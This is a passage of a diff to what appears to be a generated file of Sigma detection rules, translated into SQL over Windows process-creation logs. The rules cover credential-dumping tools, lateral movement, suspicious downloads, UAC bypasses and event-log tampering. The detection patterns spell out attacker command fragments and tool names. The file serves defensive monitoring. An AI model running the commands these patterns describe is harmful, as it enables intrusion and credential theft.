'%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": 
"7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing 
scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE 
'%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft 
Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": 
"9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - 
"attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": 
"test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - 
"status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - 
"title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", 
"status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 
